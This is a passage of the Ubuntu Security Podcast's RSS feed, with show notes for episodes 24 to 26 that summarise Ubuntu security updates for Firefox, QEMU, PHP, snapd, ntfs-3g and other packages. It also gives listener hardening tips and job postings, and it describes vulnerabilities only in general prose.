<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E027.mp3" length="28697625" type="audio/mpeg" /><itunes:duration>29:53</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 26
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-26/</link>
          <pubDate>Mon, 01 Apr 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E026.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 26</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look security updates for a heap of packages including
  Firefox &amp; Thunderbird, PHP &amp; QEMU, plus we discuss Facebook's recent
  password storage incident as well as some listener hardening tips and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look security updates for a heap of packages including
  Firefox &amp; Thunderbird, PHP &amp; QEMU, plus we discuss Facebook's recent
  password storage incident as well as some listener hardening tips and
  more.
  </itunes:summary>
        <description>  This week we look security updates for a heap of packages including
  Firefox &amp; Thunderbird, PHP &amp; QEMU, plus we discuss Facebook's recent
  password storage incident as well as some listener hardening tips and
  more.
  </description>
        <googleplay:description>  This week we look security updates for a heap of packages including
  Firefox &amp; Thunderbird, PHP &amp; QEMU, plus we discuss Facebook's recent
  password storage incident as well as some listener hardening tips and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look security updates for a heap of packages including
Firefox &amp; Thunderbird, PHP &amp; QEMU, plus we discuss Facebook&rsquo;s recent
password storage incident as well as some listener hardening tips and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>48 unique CVEs addressed</p>
<h3 id="usn-3919-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3919-1/">USN-3919-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9813">CVE-2019-9813</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9810">CVE-2019-9810</a></li>
</ul>
</li>
<li>Firefox 66.0.1 (mentioned briefly last week) - fixes two vulnerabilities discovered during Pwn2Own</li>
<li>Both in the IonMonkey JIT compiler
<ul>
<li>Incorrect alias information for the Array.prototype.slice method
leads to missing bounds check and a buffer overflow - code execution
as a result</li>
<li>Type confusion in handling of ,__proto__ mutations - ,__proto__ is
used to modify the Prototype of an object to be mutated - used for
object inheritance in JavaScript - allows arbitrary memory
read/write and therefore code execution as a result</li>
</ul>
</li>
</ul>
<h3 id="usn-3918-2-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3918-2/">USN-3918-2</a>] Firefox vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9803">CVE-2019-9803</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9793">CVE-2019-9793</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9809">CVE-2019-9809</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9808">CVE-2019-9808</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9807">CVE-2019-9807</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9806">CVE-2019-9806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9805">CVE-2019-9805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9802">CVE-2019-9802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9799">CVE-2019-9799</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9797">CVE-2019-9797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9796">CVE-2019-9796</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9795">CVE-2019-9795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9792">CVE-2019-9792</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9791">CVE-2019-9791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9790">CVE-2019-9790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9789">CVE-2019-9789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9788">CVE-2019-9788</a></li>
</ul>
</li>
<li>Firefox 66 &amp; 66.0.1 - <a href="https://ubuntusecuritypodcast.org/episode-25/">Episode 25</a> covered for Xenial, Bionic and Cosmic</li>
</ul>
<h3 id="usn-3918-3-firefox-regression">[<a href="https://usn.ubuntu.com/3918-3/">USN-3918-3</a>] Firefox regression</h3>
<ul>
<li>17 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9803">CVE-2019-9803</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9793">CVE-2019-9793</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9809">CVE-2019-9809</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9808">CVE-2019-9808</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9807">CVE-2019-9807</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9806">CVE-2019-9806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9805">CVE-2019-9805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9802">CVE-2019-9802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9799">CVE-2019-9799</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9797">CVE-2019-9797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9796">CVE-2019-9796</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9795">CVE-2019-9795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9792">CVE-2019-9792</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9791">CVE-2019-9791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9790">CVE-2019-9790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9789">CVE-2019-9789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9788">CVE-2019-9788</a></li>
</ul>
</li>
<li>Firefox 66 &amp; 66.0.1 contained a regression - so upstream released 66.0.2</li>
<li>Broke keyboard handling in Office 365, iCloud and IBM WebMail -
Firefox 66 changed the way keycode handling works so these websites
and others which use older, deprecated methods to get the keycode have
been added to an internal fallback list to use the old method</li>
</ul>
<h3 id="usn-3927-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/3927-1/">USN-3927-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9793">CVE-2019-9793</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9813">CVE-2019-9813</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9810">CVE-2019-9810</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9796">CVE-2019-9796</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9795">CVE-2019-9795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9792">CVE-2019-9792</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9791">CVE-2019-9791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9790">CVE-2019-9790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9788">CVE-2019-9788</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18506">CVE-2018-18506</a></li>
</ul>
</li>
<li>Thunderbird 60.6.1</li>
<li>Rolls in security fixes covered previous for Firefox (66.0, 66.0.1)
<ul>
<li>Both the Pwn2Own and previous fixes</li>
</ul>
</li>
<li>As for Firefox, listen back to <a href="https://ubuntusecuritypodcast.org/episode-25/">Episode 25</a> for details of 66.0 fixes</li>
</ul>
<h3 id="usn-3921-1-xmltooling-vulnerability">[<a href="https://usn.ubuntu.com/3921-1/">USN-3921-1</a>] XMLTooling vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9628">CVE-2019-9628</a></li>
</ul>
</li>
<li>Crash due to uncaught DOMException able to be triggered by a malformed
XML document - DoS</li>
<li>Thanks to Etienne Dysli Metref who provided debdiff&rsquo;s as well as
testing for this update</li>
</ul>
<h3 id="usn-3922-1-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3922-1/">USN-3922-1</a>] PHP vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9641">CVE-2019-9641</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9640">CVE-2019-9640</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9639">CVE-2019-9639</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9638">CVE-2019-9638</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9637">CVE-2019-9637</a></li>
</ul>
</li>
<li>Integer overflow on 32-bit archs when processing malformed EXIF image
data - crash, DoS</li>
<li>Failure to check available data length when processing image
thumbnails - OOB read -&gt; crash -&gt; DoS</li>
<li>OOB read of 1 byte when handling EXIF image data - crash -&gt; DoS</li>
<li>During file rename, if file is moved across file-systems, the new file
briefly is world readable allowing anyone to read it - fixed by
ensuring umask is used correctly so that the new file always has
restrictive permissions from the outset</li>
</ul>
<h3 id="usn-3923-1-qemu-vulnerabilities">[<a href="https://usn.ubuntu.com/3923-1/">USN-3923-1</a>] QEMU vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6778">CVE-2019-6778</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3812">CVE-2019-3812</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20216">CVE-2018-20216</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20191">CVE-2018-20191</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20126">CVE-2018-20126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20125">CVE-2018-20125</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20124">CVE-2018-20124</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20123">CVE-2018-20123</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19489">CVE-2018-19489</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16872">CVE-2018-16872</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16867">CVE-2018-16867</a></li>
</ul>
</li>
<li>Heap-based buffer overflow in TCP emulation</li>
<li>OOB read in i2c handling allowing a local attacker within a guest who
has permission to execute i2c commands could read qemu host process
stack memory</li>
<li>Plan9 FS host-directory sharing race-condition on file rename -&gt; crash
-&gt; DoS</li>
<li>2 issues in USB MTP handling:
<ul>
<li>time-of-check to time-of-use error allows attacker with write access
to the shared host filesystem can use this to navigate host FS in
context of QEMU host process and read any therefore read any file
which QEMU can on the host</li>
<li>Path traversal flaw due to improper filename sanitisation - allow to
read-write arbitrary host files -&gt; Dos or code execution on the host</li>
</ul>
</li>
<li>Updates for Paravirtualised RDMA subsystem:
<ul>
<li>DoS due to infinite loop</li>
<li>NULL pointer dereference due to missing read method</li>
<li>Fix various memory leaks</li>
<li>Various other NULL pointer dereferences plus a failure to check
parameters leading to possible extreme memory allocation</li>
<li>Fix OOB read triggerable by guest</li>
</ul>
</li>
</ul>
<h3 id="usn-3924-1-mod-auth-mellon-vulnerabilities">[<a href="https://usn.ubuntu.com/3924-1/">USN-3924-1</a>] mod_auth_mellon vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3878">CVE-2019-3878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3877">CVE-2019-3877</a></li>
</ul>
</li>
<li>Apache module to provide authentication and authorisation via SAML 2.0 IdP</li>
<li>Possible to bypass authorisation checks when also using mod_proxy</li>
<li>Fix an open-redirect via the logout endpoint - could encode an
absolute URL using backward-slashes (\) in place of forward-slashes
(/) and this would be propagated by the endpoint to the client where
the browser would convert these and follow the redirect - due to
mismatch in how browsers will convert these but apache&rsquo;s own internal
URI parsing does not</li>
</ul>
<h3 id="usn-3925-1-freeimage-vulnerability">[<a href="https://usn.ubuntu.com/3925-1/">USN-3925-1</a>] FreeImage vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-5684">CVE-2016-5684</a></li>
</ul>
</li>
<li>OOB write in XMP image handling - code execution</li>
</ul>
<h3 id="usn-3926-1-gpac-vulnerabilities">[<a href="https://usn.ubuntu.com/3926-1/">USN-3926-1</a>] GPAC vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7752">CVE-2018-7752</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20763">CVE-2018-20763</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20762">CVE-2018-20762</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20761">CVE-2018-20761</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20760">CVE-2018-20760</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13006">CVE-2018-13006</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13005">CVE-2018-13005</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000100">CVE-2018-1000100</a></li>
</ul>
</li>
<li>Various memory safety issues, including OOB buffer reads and writes
due to missing bounds checks (was using strcpy without checking
lengths&hellip;)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-mcmanus-on-facebook-insecure-password-storage">Joe McManus on Facebook insecure password storage</h3>
<ul>
<li><a href="https://krebsonsecurity.com/2019/03/facebook-stored-hundreds-of-millions-of-user-passwords-in-plain-text-for-years/">https://krebsonsecurity.com/2019/03/facebook-stored-hundreds-of-millions-of-user-passwords-in-plain-text-for-years/</a></li>
<li><a href="https://newsroom.fb.com/news/2019/03/keeping-passwords-secure/">https://newsroom.fb.com/news/2019/03/keeping-passwords-secure/</a></li>
</ul>
<h3 id="ubuntu-hardening-tips">Ubuntu Hardening Tips</h3>
<ul>
<li>Paul Waring got in touch to mention his tips for hardening new Ubuntu installations:
<ul>
<li>Install and configure unattended-upgrades</li>
<li>Install UFW and block all incoming connections except specific services
<ul>
<li>Can be done easily via ansible from just a few lines of YAML</li>
</ul>
</li>
<li>For servers:
<ul>
<li>Install SSHGuard to ban IP addresses with too many failed login attempts</li>
<li>Require TLS for all services via LetsEncrypt + certbot</li>
<li>Configure SSH to permit only key-based authentication</li>
<li>For wordpress installations - install wp-cli to auto-update themes
and plugins</li>
</ul>
</li>
<li>Automate as much of this as possible for automatic hardening</li>
</ul>
</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E026.mp3" length="19433142" type="audio/mpeg" /><itunes:duration>20:14</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 25
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-25/</link>
          <pubDate>Mon, 25 Mar 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E025.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 25</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.</itunes:summary>
        <description>Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.</description>
        <googleplay:description>Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>39 unique CVEs addressed</p>
<h3 id="usn-3911-1-file-vulnerabilities">[<a href="https://usn.ubuntu.com/3911-1/">USN-3911-1</a>] file vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8907">CVE-2019-8907</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8906">CVE-2019-8906</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8905">CVE-2019-8905</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8904">CVE-2019-8904</a></li>
</ul>
</li>
<li>4 DoS (crash) found via fuzzing:
<ul>
<li>Stack overflow in readelf</li>
<li>2 different OOB read due to failure to NULL terminate a string before processing it</li>
<li>Read past end of stack due to failing to properly keep track of buffer sizes</li>
</ul>
</li>
</ul>
<h3 id="usn-3906-2-libtiff-vulnerabilities">[<a href="https://usn.ubuntu.com/3906-2/">USN-3906-2</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7663">CVE-2019-7663</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6128">CVE-2019-6128</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18557">CVE-2018-18557</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17101">CVE-2018-17101</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17100">CVE-2018-17100</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1710">CVE-2018-1710</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12900">CVE-2018-12900</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10779">CVE-2018-10779</a></li>
</ul>
</li>
<li>Covered in <a href="https://ubuntusecuritypodcast.org/episode-18/">Episode 18</a> and <a href="https://ubuntusecuritypodcast.org/episode-24/">Episode 24</a> for standard Ubuntu releases (not
all CVEs covered in those updates applicable to Precise ESM)</li>
</ul>
<h3 id="usn-3912-1-gdk-pixbuf-vulnerability">[<a href="https://usn.ubuntu.com/3912-1/">USN-3912-1</a>] GDK-PixBuf vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-12447">CVE-2017-12447</a></li>
</ul>
</li>
<li>Failure to properly validate BMP image palette parameters - leading to
OOB when decoding colormap later on</li>
</ul>
<h3 id="usn-3914-1-ntfs-3g-vulnerability">[<a href="https://usn.ubuntu.com/3914-1/">USN-3914-1</a>] NTFS-3G vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9755">CVE-2019-9755</a></li>
</ul>
</li>
<li>Discovered recently by Chris Coulson during code-audit of ntfs-3g -
actually had been fixed upstream late last year but no CVE assigned</li>
<li>Heap buffer overflow able to be triggered when mounting a filesystem
onto a mount point with path name greater than PATH_MAX, and from a
current working directory which has a path name also greater than
PATH_MAX</li>
<li>Contents of buffers is attacker controlled so heap can be overflown
with attacker controlled input - likely to leverage into arbitrary
code execution</li>
<li>Contrived example BUT in Debian and Ubuntu ntfs-3g is setuid root -
which then leads to root privilege escalation with arbitrary code
execution</li>
<li>Update was released within hours of the bug being made public to fix
the heap buffer overflow</li>
<li>Currently testing ntfs-3g as not-setuid root to release in a future
update to avoid any other possible privilege escalation bugs in the
future</li>
</ul>
<h3 id="usn-3915-1-ghostscript-vulnerabilities">[<a href="https://usn.ubuntu.com/3915-1/">USN-3915-1</a>] Ghostscript vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3838">CVE-2019-3838</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3835">CVE-2019-3835</a></li>
</ul>
</li>
<li>Similar to previous CVE, forceput operator could be extracted from the
DefineResource method to allow access to the file-system outside of
the -dSAFER sandbox</li>
<li>superexec operator was available in the internal dictionary - also
able to be extracted and hence used to access files outside the
sandbox</li>
</ul>
<h3 id="usn-3913-1-p7zip-vulnerabilities">[<a href="https://usn.ubuntu.com/3913-1/">USN-3913-1</a>] P7ZIP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-17969">CVE-2017-17969</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2335">CVE-2016-2335</a></li>
</ul>
</li>
<li>Heap based OOB write when decompressing a crafted ZIP file (crash -&gt; DoS, possible code execution)</li>
<li>Heap based OOB read when decompressing a UDF file (universal disk format - used for DVD images) - crash, DoS</li>
</ul>
<h3 id="usn-3918-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3918-1/">USN-3918-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9803">CVE-2019-9803</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9793">CVE-2019-9793</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9809">CVE-2019-9809</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9808">CVE-2019-9808</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9807">CVE-2019-9807</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9806">CVE-2019-9806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9805">CVE-2019-9805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9802">CVE-2019-9802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9799">CVE-2019-9799</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9797">CVE-2019-9797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9796">CVE-2019-9796</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9795">CVE-2019-9795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9792">CVE-2019-9792</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9791">CVE-2019-9791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9790">CVE-2019-9790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9789">CVE-2019-9789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9788">CVE-2019-9788</a></li>
</ul>
</li>
<li>Almost latest Firefox release (this is 66, 66.0.1 was released Friday after Pwn2Own
last week so expect another Firefox update today or tomorrow)
<ul>
<li>Multiple memory safety issues fixed, possible code execution as a result</li>
<li>3 issues in FTP modal dialogs allow to either DoS user via
successive dialogs, or conduct social engineering attacks against
the user</li>
<li>Possible information leak from parent to child process via IPC channels</li>
<li>Various UAFs, type-confusion etc -&gt; memory corruption -&gt; possible code execution</li>
<li>Incorrect bounds checking on JS objects IF Spectre mitigations
disabled (these are enabled by default so user would have to
explicitly disable them)</li>
<li>and more&hellip;</li>
</ul>
</li>
</ul>
<h3 id="usn-3917-1-snapd-vulnerability">[<a href="https://usn.ubuntu.com/3917-1/">USN-3917-1</a>] snapd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7303">CVE-2019-7303</a></li>
</ul>
</li>
<li>Jann Horn reported the seccomp blacklist for TIOCSTI can be bypassed</li>
<li>snapd creates a seccomp filter for each snap which is designed to
block TIOCSTI (as this can be used to fake input to other processes
outside of the sandbox)</li>
<li>This is a 32-bit value to the ioctl system call, but on 64-bit
architectures the kernel does this comparison as a 64-bit integer - so
can be circumvented by using a 64-bit value to ioctl systemcall which
has other bits set in the upper 32 bits - since when seccomp does
comparison it uses the full 64 bits - so it won&rsquo;t match the 32-bit
value of TIOCSTI and so will be allowed - but then when used as the
ioctl() argument it will correctly be truncated to 32-bits and the
ioctl will proceed</li>
<li>Fixed in snapd to add a second seccomp filter to disallow anything in
the upper 32-bits</li>
<li>Initially seemed like a kernel or libseccomp issue but both currently
document this as a limitation already so treated in the end as a
vulnerability in snapd</li>
</ul>
<h3 id="usn-3916-1-libsolv-vulnerabilities">[<a href="https://usn.ubuntu.com/3916-1/">USN-3916-1</a>] libsolv vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20534">CVE-2018-20534</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20533">CVE-2018-20533</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20532">CVE-2018-20532</a></li>
</ul>
</li>
<li>Dependency solver used by packaging systems to resolve dependencies
between packages etc</li>
<li>2 NULL pointer dereferences and 1 invalid memory read due to
mishandling of variable length function arguments - all crash -&gt; DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E025.mp3" length="14157243" type="audio/mpeg" /><itunes:duration>14:44</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 24
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-24/</link>
          <pubDate>Tue, 19 Mar 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E024.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 24</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the
  Linux kernel and more. We also talk about some listener feedback on
  Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the
  Linux kernel and more. We also talk about some listener feedback on
  Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
  </itunes:summary>
        <description>  A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the
  Linux kernel and more. We also talk about some listener feedback on
  Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
  </description>
        <googleplay:description>  A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the
  Linux kernel and more. We also talk about some listener feedback on
  Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the
Linux kernel and more. We also talk about some listener feedback on
Ubuntu hardening and the launch of Ubuntu 14.04 ESM.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>18 unique CVEs addressed</p>
<h3 id="usn-3905-1-poppler-vulnerability">[<a href="https://usn.ubuntu.com/3905-1/">USN-3905-1</a>] poppler vulnerability</h3>
<ul>
